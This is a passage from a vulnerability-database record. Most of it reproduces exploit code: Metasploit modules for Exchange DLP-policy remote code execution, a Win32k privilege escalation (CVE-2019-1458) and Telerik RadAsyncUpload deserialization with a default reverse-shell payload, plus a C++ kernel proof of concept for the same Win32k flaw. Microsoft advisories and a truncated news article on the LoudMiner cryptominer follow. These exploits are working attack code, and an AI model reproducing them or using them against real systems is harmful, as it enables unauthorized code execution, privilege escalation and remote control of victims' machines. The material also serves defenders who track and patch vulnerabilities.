\nfail_with(Failure::NoAccess, 'Mailbox is active but not fully configured') \nend \n \nprint_good('Successfully logged in to OWA') \nend \n \ndef retrieve_viewstate \nprint_status('Retrieving ViewState from DLP policy creation page') \n \nres = send_request_cgi( \n'method' => 'GET', \n'uri' => normalize_uri(target_uri.path, '/ecp/DLPPolicy/ManagePolicyFromISV.aspx'), \n'agent' => '', # HACK: Bypass Exchange's User-Agent validation \n'keep_cookies' => true \n) \n \nunless res \nfail_with(Failure::Unreachable, 'Failed to access DLP policy creation page') \nend \n \nunless res.code == 200 && (viewstate = res.get_html_document.at('//input[@id = \"__VIEWSTATE\"]/@value')&.text) \nfail_with(Failure::UnexpectedReply, 'Failed to retrieve ViewState') \nend \n \nprint_good('Successfully retrieved ViewState') \nviewstate \nend \n \ndef create_dlp_policy(viewstate) \nprint_status('Creating custom DLP policy from malicious template') \nvprint_status(\"DLP policy name: #{dlp_policy_name}\") \n \nform_data = Rex::MIME::Message.new \nform_data.add_part(viewstate, nil, nil, 'form-data; name=\"__VIEWSTATE\"') \nform_data.add_part( \n'ResultPanePlaceHolder_ButtonsPanel_btnNext', \nnil, \nnil, \n'form-data; name=\"ctl00$ResultPanePlaceHolder$senderBtn\"' \n) \nform_data.add_part( \ndlp_policy_name, \nnil, \nnil, \n'form-data; name=\"ctl00$ResultPanePlaceHolder$contentContainer$name\"' \n) \nform_data.add_part( \ndlp_policy_template, \n'text/xml', \nnil, \n%(form-data; name=\"ctl00$ResultPanePlaceHolder$contentContainer$upldCtrl\"; filename=\"#{dlp_policy_filename}\") \n) \n \nsend_request_cgi({ \n'method' => 'POST', \n'uri' => normalize_uri(target_uri.path, '/ecp/DLPPolicy/ManagePolicyFromISV.aspx'), \n'agent' => '', # HACK: Bypass Exchange's User-Agent validation \n'ctype' => \"multipart/form-data; boundary=#{form_data.bound}\", \n'data' => form_data.to_s \n}, 0) \nend \n \ndef dlp_policy_template \n# https://docs.microsoft.com/en-us/exchange/developing-dlp-policy-template-files-exchange-2013-help \n<<~XML \n<?xml version=\"1.0\" encoding=\"UTF-8\"?> \n<dlpPolicyTemplates> \n<dlpPolicyTemplate id=\"F7C29AEC-A52D-4502-9670-141424A83FAB\" mode=\"Audit\" state=\"Enabled\" version=\"15.0.2.0\"> \n<contentVersion>4</contentVersion> \n<publisherName>Metasploit</publisherName> \n<name> \n<localizedString lang=\"en\">#{dlp_policy_name}</localizedString> \n</name> \n<description> \n<localizedString lang=\"en\">wvu was here</localizedString> \n</description> \n<keywords></keywords> \n<ruleParameters></ruleParameters> \n<policyCommands> \n<commandBlock> \n<![CDATA[#{cmd_psh_payload(payload.encoded, payload.arch.first, exec_in_place: true)}]]> \n</commandBlock> \n</policyCommands> \n<policyCommandsResources></policyCommandsResources> \n</dlpPolicyTemplate> \n</dlpPolicyTemplates> \nXML \nend \n \ndef dlp_policy_name \n@dlp_policy_name ||= \"#{Faker::Bank.name.titleize} Data\" \nend \n \ndef dlp_policy_filename \n@dlp_policy_filename ||= \"#{rand_text_alphanumeric(8..42)}.xml\" \nend \n \nend \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/159210/exchange_ecp_dlp_policy.rb.txt"}, {"lastseen": "2020-03-09T22:44:29", "description": "", "published": "2020-03-06T00:00:00", "type": "packetstorm", "title": "Microsoft Windows WizardOpium Local Privilege Escalation", "bulletinFamily": "exploit", "cvelist": ["CVE-2019-1458"], "modified": "2020-03-06T00:00:00", "id": "PACKETSTORM:156651", "href": "https://packetstormsecurity.com/files/156651/Microsoft-Windows-WizardOpium-Local-Privilege-Escalation.html", "sourceData": "`#include <cstdio> \n#include <windows.h> \n \nextern \"C\" NTSTATUS NtUserMessageCall(HWND hWnd, UINT msg, WPARAM wParam, LPARAM lParam, ULONG_PTR ResultInfo, DWORD dwType, BOOL bAscii); \n \nint main() { \nHINSTANCE hInstance = GetModuleHandle(NULL); \n \nWNDCLASSEX wcx; \nZeroMemory(&wcx, sizeof(wcx)); \nwcx.hInstance = hInstance; \nwcx.cbSize = sizeof(wcx); \nwcx.lpszClassName = L\"SploitWnd\"; \nwcx.lpfnWndProc = DefWindowProc; \nwcx.cbWndExtra = 8; //pass check in xxxSwitchWndProc to set wnd->fnid = 0x2A0 \n \nprintf(\"[*] Registering window\\n\"); \nATOM wndAtom = RegisterClassEx(&wcx); \nif (wndAtom == INVALID_ATOM) { \nprintf(\"[-] Failed registering SploitWnd window class\\n\"); \nexit(-1); \n} \n \nprintf(\"[*] Creating instance of this window\\n\"); \nHWND sploitWnd = CreateWindowEx(0, L\"SploitWnd\", L\"\", WS_VISIBLE, 0, 0, 0, 0, NULL, NULL, hInstance, NULL); \nif (sploitWnd == INVALID_HANDLE_VALUE) { \nprintf(\"[-] Failed to create SploitWnd window\\n\"); \nexit(-1); \n} \n \nprintf(\"[*] Calling NtUserMessageCall to set fnid = 0x2A0 on window\\n\"); \nNtUserMessageCall(sploitWnd, WM_CREATE, 0, 0, 0, 0xE0, 1); \n \nprintf(\"[*] Allocate memory to be used for corruption\\n\"); \nPVOID mem = VirtualAlloc(0, 0x1000, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE); \nprintf(\"\\tptr: %p\\n\", mem); \nPBYTE byteView = (PBYTE)mem; \nbyteView[0x6c] = 1; // use GetKeyState in xxxPaintSwitchWindow \n \n//pass DrawSwitchWndHilite double dereference \nPVOID* ulongView = (PVOID*)mem; \nulongView[0x20 / sizeof(PVOID)] = mem; \n \nprintf(\"[*] Calling SetWindowLongPtr to set window extra data, that will be later dereferenced\\n\"); \nSetWindowLongPtr(sploitWnd, 0, (LONG_PTR)mem); \nprintf(\"[*] GetLastError = %x\\n\", GetLastError()); \n \nprintf(\"[*] Creating switch window #32771, this has a result of setting (gpsi+0x154) = 0x130\\n\"); \nHWND switchWnd = CreateWindowEx(0, (LPCWSTR)0x8003, L\"\", 0, 0, 0, 0, 0, NULL, NULL, hInstance, NULL); \n \nprintf(\"[*] Simulating alt key press\\n\"); \nBYTE keyState[256]; \nGetKeyboardState(keyState); \nkeyState[VK_MENU] |= 0x80; \nSetKeyboardState(keyState); \n \nprintf(\"[*] Triggering dereference of wnd->extraData by calling NtUserMessageCall second time\"); \nNtUserMessageCall(sploitWnd, WM_ERASEBKGND, 0, 0, 0, 0x0, 1); \n} \n`\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://packetstormsecurity.com/files/download/156651/mswindowswizard-escalate.txt"}, {"lastseen": "2020-10-15T19:31:18", "description": "", "published": "2020-10-15T00:00:00", "type": "packetstorm", "title": "Microsoft Windows Uninitialized Variable Local Privilege Escalation", "bulletinFamily": "exploit", "cvelist": ["CVE-2019-1458"], "modified": "2020-10-15T00:00:00", "id": "PACKETSTORM:159569", "href": "https://packetstormsecurity.com/files/159569/Microsoft-Windows-Uninitialized-Variable-Local-Privilege-Escalation.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nrequire 'msf/core/post/file' \nrequire 'msf/core/exploit/exe' \nrequire 'msf/core/post/windows/priv' \n \nclass MetasploitModule < Msf::Exploit::Local \nRank = NormalRanking \n \ninclude Msf::Post::File \ninclude Msf::Exploit::EXE \ninclude Msf::Post::Windows::Priv \ninclude Msf::Post::Windows::FileInfo \ninclude Msf::Post::Windows::ReflectiveDLLInjection \ninclude Msf::Exploit::Remote::AutoCheck \n \ndef initialize(info = {}) \nsuper( \nupdate_info( \ninfo, \n'Name' => 'Microsoft Windows Uninitialized Variable Local Privilege Elevation', \n'Description' => %q{ \nThis module exploits CVE-2019-1458, an arbitrary pointer dereference vulnerability \nwithin win32k which occurs due to an uninitalized variable, which allows user mode attackers \nto write a limited amount of controlled data to an attacker controlled address \nin kernel memory. By utilizing this vulnerability to execute controlled writes \nto kernel memory, an attacker can gain arbitrary code execution \nas the SYSTEM user. \n \nThis module has been tested against Windows 7 x64 SP1. Offsets within the \nexploit code may need to be adjusted to work with other versions of Windows. \nThe exploit can only be triggered once against the target and can cause the \ntarget machine to reboot when the session is terminated. \n}, \n'License' => MSF_LICENSE, \n'Author' => \n[ \n'piotrflorczyk', # poc \n'unamer', # exploit \n'timwr', # msf module \n], \n'Platform' => 'win', \n'SessionTypes' => ['meterpreter'], \n'Targets' => \n[ \n['Windows 7 x64', { 'Arch' => ARCH_X64 }] \n], \n'Notes' => \n{ \n'Stability' => [ CRASH_OS_RESTARTS ], \n'Reliability' => [ UNRELIABLE_SESSION ] \n}, \n'References' => \n[ \n['CVE', '2019-1458'], \n['URL', 'https://github.com/unamer/CVE-2019-1458'], \n['URL', 'https://github.com/piotrflorczyk/cve-2019-1458_POC'], \n['URL', 'https://securelist.com/windows-0-day-exploit-cve-2019-1458-used-in-operation-wizardopium/95432/'], \n['URL', 'https://googleprojectzero.blogspot.com/p/rca-cve-2019-1458.html'] \n], \n'DisclosureDate' => '2019-12-10', \n'DefaultTarget' => 0, \n'AKA' => [ 'WizardOpium' ] \n) \n) \nregister_options([ \nOptString.new('PROCESS', [true, 'Name of process to spawn and inject dll into.', 'notepad.exe']) \n]) \nend \n \ndef setup_process \nprocess_name = datastore['PROCESS'] \nbegin \nprint_status(\"Launching #{process_name} to host the exploit...\") \nlaunch_process = client.sys.process.execute(process_name, nil, 'Hidden' => true) \nprocess = client.sys.process.open(launch_process.pid, PROCESS_ALL_ACCESS) \nprint_good(\"Process #{process.pid} launched.\") \nrescue Rex::Post::Meterpreter::RequestError \n# Sandboxes could not allow to create a new process \n# stdapi_sys_process_execute: Operation failed: Access is denied. \nprint_error('Operation failed. Trying to elevate the current process...') \nprocess = client.sys.process.open \nend \nprocess \nend \n \ndef check \nsysinfo_value = sysinfo['OS'] \n \nif sysinfo_value !~ /windows/i \n# Non-Windows systems are definitely not affected. \nreturn CheckCode::Safe \nend \n \nfile_path = expand_path('%WINDIR%\\\\system32\\\\win32k.sys') \nmajor, minor, build, revision, branch = file_version(file_path) \nvprint_status(\"win32k.sys file version: #{major}.#{minor}.#{build}.#{revision} branch: #{branch}\") \n \nbuild_num_gemversion = Gem::Version.new(\"#{major}.#{minor}.#{build}.#{revision}\") \n \n# Build numbers taken from https://www.qualys.com/research/security-alerts/2019-12-10/microsoft/ \nif (build_num_gemversion >= Gem::Version.new('6.0.6000.0')) && (build_num_gemversion < Gem::Version.new('6.0.6003.20692')) # Windows Vista and Windows Server 2008 \nreturn CheckCode::Appears \nelsif (build_num_gemversion >= Gem::Version.new('6.1.7600.0')) && (build_num_gemversion < Gem::Version.new('6.1.7601.24540')) # Windows 7 and Windows Server 2008 R2 \nreturn CheckCode::Appears \nelsif (build_num_gemversion >= Gem::Version.new('6.2.9200.0')) && (build_num_gemversion < Gem::Version.new('6.2.9200.22932')) # Windows 8 and Windows Server 2012 \nreturn CheckCode::Appears \nelsif (build_num_gemversion >= Gem::Version.new('6.3.9600.0')) && (build_num_gemversion < Gem::Version.new('6.3.9600.19574')) # Windows 8.1 and Windows Server 2012 R2 \nreturn CheckCode::Appears \nelsif (build_num_gemversion >= Gem::Version.new('10.0.10240.0')) && (build_num_gemversion < Gem::Version.new('10.0.10240.18427')) # Windows 10 v1507 \nreturn CheckCode::Appears \nelsif (build_num_gemversion >= Gem::Version.new('10.0.10586.0')) && (build_num_gemversion < Gem::Version.new('10.0.10586.99999')) # Windows 10 v1511 \nreturn CheckCode::Appears \nelsif (build_num_gemversion >= Gem::Version.new('10.0.14393.0')) && (build_num_gemversion < Gem::Version.new('10.0.14393.3383')) # Windows 10 v1607 \nreturn CheckCode::Appears \nelse \nreturn CheckCode::Safe \nend \nend \n \ndef exploit \nsuper \n \nif is_system? \nfail_with(Failure::None, 'Session is already elevated') \nend \n \nif sysinfo['Architecture'] != ARCH_X64 \nfail_with(Failure::NoTarget, 'Running against 32-bit systems is not supported') \nend \n \nprocess = setup_process \nlibrary_data = exploit_data('CVE-2019-1458', 'exploit.dll') \nprint_status(\"Injecting exploit into #{process.pid} ...\") \nexploit_mem, offset = inject_dll_data_into_process(process, library_data) \nprint_status(\"Exploit injected. Injecting payload into #{process.pid}...\") \nencoded_payload = payload.encoded \npayload_mem = inject_into_process(process, [encoded_payload.length].pack('I<') + encoded_payload) \n \n# invoke the exploit, passing in the address of the payload that \n# we want invoked on successful exploitation. \nprint_status('Payload injected. Executing exploit...') \nprocess.thread.create(exploit_mem + offset, payload_mem) \nend \nend \n`\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://packetstormsecurity.com/files/download/159569/cve_2019_1458_wizardopium.rb.txt"}, {"lastseen": "2020-10-20T20:37:38", "description": "", "published": "2020-10-20T00:00:00", "type": "packetstorm", "title": "Telerik UI ASP.NET AJAX RadAsyncUpload Deserialization", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-11317", "CVE-2019-18935"], "modified": "2020-10-20T00:00:00", "id": "PACKETSTORM:159653", "href": "https://packetstormsecurity.com/files/159653/Telerik-UI-ASP.NET-AJAX-RadAsyncUpload-Deserialization.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Remote \nRank = ExcellentRanking \n \nprepend Msf::Exploit::Remote::AutoCheck \ninclude Msf::Exploit::Remote::HttpClient \ninclude Msf::Exploit::EXE \ninclude Msf::Exploit::FileDropper \n \nSALT = \"\\x3a\\x54\\x5b\\x19\\x0a\\x22\\x1d\\x44\\x3c\\x58\\x2c\\x33\\x01\".b \n# default keys per CVE-2017-11317 \nDEFAULT_RAU_SIGNING_KEY = 'PrivateKeyForHashOfUploadConfiguration'.freeze \nDEFAULT_RAU_ENCRYPTION_KEY = 'PrivateKeyForEncryptionOfRadAsyncUploadConfiguration'.freeze \nCVE_2017_11317_REFERENCES = [ \n['CVE', '2017-11317'], # Unrestricted File Upload via Weak Encryption \n['URL', 'https://github.com/bao7uo/RAU_crypto'], \n['URL', 'https://www.telerik.com/support/kb/aspnet-ajax/upload-(async)/details/unrestricted-file-upload'], \n['URL', 'https://github.com/straightblast/UnRadAsyncUpload/wiki'], \n].freeze \nCVE_2019_18935_REFERENCES = [ \n['CVE', '2019-18935'], # Remote Code Execution via Insecure Deserialization \n['URL', 'https://github.com/noperator/CVE-2019-18935'], \n['URL', 'https://www.telerik.com/support/kb/aspnet-ajax/details/allows-javascriptserializer-deserialization'], \n['URL', 'https://codewhitesec.blogspot.com/2019/02/telerik-revisited.html'], \n['URL', 'https://labs.bishopfox.com/tech-blog/cve-2019-18935-remote-code-execution-in-telerik-ui'], \n].freeze \n \ndef initialize(info = {}) \nsuper( \nupdate_info( \ninfo, \n'Name' => 'Telerik UI ASP.NET AJAX RadAsyncUpload Deserialization', \n'Description' => %q{ \nThis module exploits the .NET deserialization vulnerability within the RadAsyncUpload (RAU) component of Telerik \nUI ASP.NET AJAX that is identified as CVE-2019-18935. In order to do so the module must upload a mixed mode .NET \nassembly DLL which is then loaded through the deserialization flaw. Uploading the file requires knowledge of the \ncryptographic keys used by RAU. The default values used by this module are related to CVE-2017-11317, which once \npatched randomizes these keys. It is also necessary to know the version of Telerik UI ASP.NET that is running. \nThis version number is in the format YYYY.#(.###)? where YYYY is the year of the release (e.g. '2020.3.915'). \n}, \n'Author' => [ \n'Spencer McIntyre', # Metasploit module \n'Paul Taylor', # (@bao7uo) Python PoCs \n'Markus Wulftange', # (@mwulftange) discovery of CVE-2019-18935 \n'Caleb Gross', # (@noperator) research on CVE-2019-18935 \n'Alvaro Mu\u00f1oz', # (@pwntester) discovery of CVE-2017-11317 \n'Oleksandr Mirosh', # (@olekmirosh) discover of CVE-2017-11317 \n'straightblast', # (@straight_blast) discovery of CVE-2017-11317 \n], \n'License' => MSF_LICENSE, \n'References' => CVE_2017_11317_REFERENCES + CVE_2019_18935_REFERENCES, \n'Platform' => 'win', \n'Arch' => [ARCH_X86, ARCH_X64], \n'Targets' => [['Windows', {}],], \n'Payload' => { 'Space' => 2048 }, \n'DefaultOptions' => { \n'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp', \n'RPORT' => 443, \n'SSL' => true \n}, \n'DefaultTarget' => 0, \n'DisclosureDate' => '2019-12-09', # Telerik article on CVE-2019-18935 \n'Notes' => { \n'Reliability' => [UNRELIABLE_SESSION], \n'Stability' => [CRASH_SAFE], \n'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS] \n}, \n'Privileged' => true \n) \n) \n \nregister_options([ \nOptString.new('TARGETURI', [ true, 'The base path to the web application', '/' ]), \nOptString.new('FILE_NAME', [ false, 'The base file name for the upload (default will be random)' ]), \nOptString.new('DESTINATION', [ true, 'The destination folder for the upload', 'C:\\\\Windows\\\\Temp' ]), \nOptString.new('RAU_ENCRYPTION_KEY', [ true, 'The encryption key for the RAU configuration data', DEFAULT_RAU_ENCRYPTION_KEY ]), \nOptString.new('RAU_SIGNING_KEY', [ true, 'The signing key for the RAU configuration data', DEFAULT_RAU_SIGNING_KEY ]), \nOptString.new('VERSION', [ false, 'The Telerik UI ASP.NET AJAX version' ]) \n]) \nend \n \ndef dest_file_basename \n@dest_file_name = @dest_file_name || datastore['FILE_NAME'] || Rex::Text.rand_text_alphanumeric(rand(4..35)) + '.dll' \nend \n \ndef check \nres = send_request_cgi({ \n'uri' => normalize_uri(target_uri.path, 'Telerik.Web.UI.WebResource.axd'), \n'vars_get' => { 'type' => 'rau' } \n}) \nreturn CheckCode::Safe unless res&.code == 200 \nreturn CheckCode::Safe unless res.get_json_document&.dig('message') =~ /RadAsyncUpload handler is registered succesfully/ \n \nif datastore['VERSION'].blank? \n@version = enumerate_version \nelse \nbegin \nupload_file('', datastore['VERSION']) \nrescue Msf::Exploit::Failed \nreturn CheckCode::Safe \nend \n \n@version = datastore['VERSION'] \nend \n \nif !@version.nil? && datastore['RAU_SIGNING_KEY'] == DEFAULT_RAU_SIGNING_KEY && datastore['RAU_ENCRYPTION_KEY'] == DEFAULT_RAU_ENCRYPTION_KEY \nprint_status('Server is using default crypto keys and is vulnerable to CVE-2017-11317') \nreport_vuln({ \nhost: rhost, \nport: rport, \nproto: 'tcp', \nname: 'Unrestricted File Upload via Weak Encryption', \nrefs: CVE_2017_11317_REFERENCES.map { |ctx_id, ctx_val| SiteReference.new(ctx_id, ctx_val) } \n}) \nend \n \n# with custom errors enabled (which is the default), it's not possible to test for the serialization flaw without triggering it \nCheckCode::Detected \nend \n \ndef exploit \nfail_with(Failure::BadConfig, 'No version was specified and it could not be enumerated') if @version.nil? \nupload_file(generate_payload_dll({ mixed_mode: true }), @version) \nexecute_payload \nend \n \ndef execute_payload \nprint_status('Executing the payload...') \nserialized_object = { 'Path' => \"#{datastore['DESTINATION'].chomp('\\\\').gsub('\\\\', '/')}/#{dest_file_basename}.tmp\" } \nserialized_object_type = Msf::Util::DotNetDeserialization::Assemblies::VERSIONS['4.0.0.0']['System.Configuration.Install']['System.Configuration.Install.AssemblyInstaller'] \n \nmsg = rau_mime_payload(serialized_object, serialized_object_type.to_s) \nres = send_request_cgi( \n{ \n'uri' => normalize_uri(target_uri.path, 'Telerik.Web.UI.WebResource.axd'), \n'vars_get' => { 'type' => 'rau' }, \n'method' => 'POST', \n'data' => msg.to_s, \n'ctype' => \"multipart/form-data; boundary=#{msg.bound}\" \n}, 5 \n) \n# this request to execute the payload times out on success and returns 200 when it fails, for example because the \n# AllowedCustomMetaDataTypes setting is blocking the necessary code path \nfail_with(Failure::UnexpectedReply, 'Failed to execute the payload') if res&.code == 200 \nend \n \ndef upload_file(file_contents, version) \ntarget_folder = encrypt('') \ntemp_target_folder = encrypt(datastore['DESTINATION'].encode('UTF-16LE')) \nif (version =~ /(\\d{4})\\.\\d+.\\d+/) && Regexp.last_match(1).to_i > 2016 \n# signing is only necessary for versions >= 2017.1.118 (versions that don't match the regex don't require signing) \ntarget_folder << sign(target_folder) \ntemp_target_folder << sign(temp_target_folder) \nend \n \nserialized_object = { \n'TargetFolder' => target_folder, \n'TempTargetFolder' => temp_target_folder, \n'MaxFileSize' => 0, \n'TimeToLive' => { \n'Ticks' => 1440000000000, \n'Days' => 0, \n'Hours' => 40, \n'Minutes' => 0, \n'Seconds' => 0, \n'Milliseconds' => 0, \n'TotalDays' => 1.6666666666666665, \n'TotalHours' => 40, \n'TotalMinutes' => 2400, \n'TotalSeconds' => 144000, \n'TotalMilliseconds' => 144000000 \n}, \n'UseApplicationPoolImpersonation' => false \n} \nserialized_object_type = \"Telerik.Web.UI.AsyncUploadConfiguration, Telerik.Web.UI, Version=#{version}, Culture=neutral, PublicKeyToken=121fae78165ba3d4\" \n \nmsg = rau_mime_payload(serialized_object, serialized_object_type, file_contents: file_contents) \nres = send_request_cgi( \n{ \n'uri' => normalize_uri(target_uri.path, 'Telerik.Web.UI.WebResource.axd'), \n'vars_get' => { 'type' => 'rau' }, \n'method' => 'POST', \n'data' => msg.to_s, \n'ctype' => \"multipart/form-data; boundary=#{msg.bound}\" \n} \n) \nfail_with(Failure::UnexpectedReply, 'The upload failed') unless res&.code == 200 \nmetadata = JSON.parse(decrypt(res.get_json_document.dig('metaData')).force_encoding('UTF-16LE')) \ndest_path = \"#{datastore['DESTINATION'].chomp('\\\\')}\\\\#{metadata['TempFileName']}\" \nprint_good(\"Uploaded #{file_contents.length} bytes to: #{dest_path}\") \nregister_file_for_cleanup(dest_path) \nend \n \ndef rau_mime_payload(serialized_object, serialized_object_type, file_contents: '') \nmetadata = { 'TotalChunks' => 1, 'ChunkIndex' => 0, 'TotalFileSize' => 1, 'UploadID' => dest_file_basename } \n \npost_data = Rex::MIME::Message.new \npost_data.add_part(encrypt(serialized_object.to_json.encode('UTF-16LE')) + '&' + encrypt(serialized_object_type.encode('UTF-16LE')), nil, nil, 'form-data; name=\"rauPostData\"') \npost_data.add_part(file_contents, 'application/octet-stream', 'binary', \"form-data; name=\\\"file\\\"; filename=\\\"#{dest_file_basename}\\\"\") \npost_data.add_part(dest_file_basename, nil, nil, 'form-data; name=\"fileName\"') \npost_data.add_part('application/octet-stream', nil, nil, 'form-data; name=\"contentType\"') \npost_data.add_part('1970-01-01T00:00:00.000Z', nil, nil, 'form-data; name=\"lastModifiedDate\"') \npost_data.add_part(metadata.to_json, nil, nil, 'form-data; name=\"metadata\"') \npost_data \nend \n \ndef enumerate_version \nprint_status('Enumerating the Telerik UI ASP.NET AJAX version, this will fail if the keys are incorrect') \nFile.open(File.join(Msf::Config.data_directory, 'wordlists', 'telerik_ui_asp_net_ajax_versions.txt'), 'rb').each_line do |version| \nversion.strip! \nnext if version.start_with?('#') \n \nvprint_status(\"Checking version: #{version}\") \nbegin \nupload_file('', version) \nrescue Msf::Exploit::Failed \nnext \nend \n \nprint_good(\"The Telerik UI ASP.NET AJAX version has been identified as: #{version}\") \nreturn version \nend \n \nnil \nend \n \n# \n# Crypto Functions \n# \ndef get_cipher(mode) \n# older versions might need to use pbkdf1 \nblob = OpenSSL::PKCS5.pbkdf2_hmac_sha1(datastore['RAU_ENCRYPTION_KEY'], SALT, 1000, 48) \ncipher = OpenSSL::Cipher.new('AES-256-CBC').send(mode) \ncipher.key = blob.slice(0, 32) \ncipher.iv = blob.slice(32, 48) \ncipher \nend \n \ndef decrypt(cipher_text) \ncipher = get_cipher(:decrypt) \ncipher.update(Rex::Text.decode_base64(cipher_text)) + cipher.final \nend \n \ndef encrypt(plain_text) \ncipher = get_cipher(:encrypt) \ncipher_text = '' \ncipher_text << cipher.update(plain_text) unless plain_text.empty? \ncipher_text << cipher.final \nRex::Text.encode_base64(cipher_text) \nend \n \ndef sign(data) \nRex::Text.encode_base64(OpenSSL::HMAC.digest('SHA256', datastore['RAU_SIGNING_KEY'], data)) \nend \nend \n`\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://packetstormsecurity.com/files/download/159653/telerik_rau_deserialization.rb.txt"}], "mscve": [{"lastseen": "2020-10-22T11:03:45", "bulletinFamily": "microsoft", "cvelist": ["CVE-2020-16952"], "description": "A remote code execution vulnerability exists in Microsoft SharePoint when the software fails to check the source markup of an application package. An attacker who successfully exploited the vulnerability could run arbitrary code in the context of the SharePoint application pool and the SharePoint server farm account.\n\nExploitation of this vulnerability requires that a user uploads a specially crafted SharePoint application package to an affected version of SharePoint.\n\nThe security update addresses the vulnerability by correcting how SharePoint checks the source markup of application packages.\n", "edition": 2, "modified": "2020-10-13T07:00:00", "id": "MS:CVE-2020-16952", "href": "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16952", "published": "2020-10-13T07:00:00", "title": "Microsoft SharePoint Remote Code Execution Vulnerability", "type": "mscve", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-09-21T14:46:32", "bulletinFamily": "microsoft", "cvelist": ["CVE-2020-16875"], "description": "A remote code execution vulnerability exists in Microsoft Exchange server due to improper validation of cmdlet arguments.\n\nAn attacker who successfully exploited the vulnerability could run arbitrary code in the context of the System user. Exploitation of the vulnerability requires an authenticated user in a certain Exchange role to be compromised.\n\nThe security update addresses the vulnerability by correcting how Microsoft Exchange handles cmdlet arguments.\n", "edition": 4, "modified": "2020-09-08T07:00:00", "id": "MS:CVE-2020-16875", "href": "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16875", "published": "2020-09-08T07:00:00", "title": "Microsoft Exchange Server Remote Code Execution Vulnerability", "type": "mscve", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2020-08-07T11:48:18", "bulletinFamily": "microsoft", "cvelist": ["CVE-2019-1458"], "description": "An elevation of privilege vulnerability exists in Windows when the Win32k component fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n\nTo exploit this vulnerability, an attacker would first have to log on to the system. An attacker could then run a specially crafted application that could exploit the vulnerability and take control of an affected system.\n\nThe update addresses this vulnerability by correcting how Win32k handles objects in memory.\n", "edition": 2, "modified": "2019-12-10T08:00:00", "id": "MS:CVE-2019-1458", "href": "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1458", "published": "2019-12-10T08:00:00", "title": "Win32k Elevation of Privilege Vulnerability", "type": "mscve", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "threatpost": [{"lastseen": "2020-05-07T21:56:19", "bulletinFamily": "info", "cvelist": ["CVE-2019-18935"], "description": "An unusual cryptocurrency miner, dubbed LoudMiner, is spreading via pirated copies of Virtual Studio Technology. It uses virtualization software to mine Monero on a Tiny Core Linux virtual machine \u2013 a unique approach, according to researchers.\n\nVirtual Studio Technology (VST) is an audio plug-in software interface that integrates software synthesizers and effects in digital audio workstations. The idea is to simulate traditional recording studio functions. ESET analysts recently uncovered a WordPress-based website hawking trojanized packages that incorporate the popular software, including Propellerhead Reason, Ableton Live, Reaktor 6, AutoTune and others. In all, there are 137 VST-related applications (42 for Windows and 95 for macOS) available for download on the site.\n\nUpon downloading, an unwitting audiophile\u2019s computer would be infVirtual Studio Technology (VST)ected with LoudMiner, which consists of the VST application bundled with virtualization software, a Linux image and additional files used to achieve persistence. It uses the XMRig cryptominer hosted on a virtual machine. So far, three Mac versions and one Windows variant of the malware have been uncovered.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\n\u201cRegarding the nature of the applications targeted, it is interesting to observe that their purpose is related to audio production,\u201d wrote Michal Malik, researcher at ESET, [in a posting](<https://www.welivesecurity.com/2019/06/20/loudminer-mining-cracked-vst-software/>) on Thursday. \u201cThus, the machines that they are installed on should have good processing power and high CPU consumption will not surprise the users.\u201d\n\nBecause the victim would also get a functioning version of the application that they expected, the attackers gain some air cover.\n\n\u201cThese applications are usually complex, so it is not unexpected for them to be huge files,\u201d Malik explained. \u201cThe attackers use this to their advantage to camouflage their virtual machine (VM) images.\u201d\n\nDespite the efforts at camouflage, victims quickly become aware that something\u2019s amiss, thanks to system slowdowns, according to [forum postings](<https://discussions.apple.com/thread/8602989>).\n\n\u201cUnfortunately, had to reinstall OSX, the problem was that Ableton Live 10, which I have downloaded it from a torrent site and not from the official site, installs a miner too, running at the background causing this,\u201d said a user named \u201cMacloni.\u201d\n\n\u201cThe same user attached screenshots of the Activity Monitor indicating 2 processes \u2013 qemu-system-x86_64 and tools-service \u2013 taking 25 percent of CPU resources and running as root,\u201d said Malik, adding that some users found a full 100 percent of their CPU capacity hijacked.\n\n## Using a Virtual Machine\n\nLoudMiner uses QEMU on macOS and VirtualBox on Windows to connect to a Linux image running on a VM \u2013 more specifically, it\u2019s a Tiny Core Linux 9.0 image configured to run XMRig. The victim\u2019s machine is added to a mining pool that the Linux image uses for CPU power.\n\nMalik noted that that the decision by the malware authors to use VMs for performing the mining instead of hosting it locally on the victim\u2019s computer is \u201cquite remarkable and this is not something we routinely see\u201d \u2013 although it\u2019s not unheard of for legitimate miners to [deploy the strategy](<https://medium.com/@Jayvdb/how-to-start-mining-cryptocurrency-for-fun-and-possibly-profit-71517859ed91>) to save money.\n\n\u201cUser downloads the application and follows attached instructions on how to install it. LoudMiner is installed first, the actual VST software after,\u201d he explained. \u201cLoudMiner hides itself and becomes persistent on reboot. The Linux virtual machine is launched and [the mining starts](<https://threatpost.com/cryptomining-malware-uninstalls-cloud-security-products/140959/>). Scripts inside the virtual machine can contact the C2 server to update the miner.\u201d\n\nHe said that in order to identify a particular mining session, a file containing the IP address of the machine and the 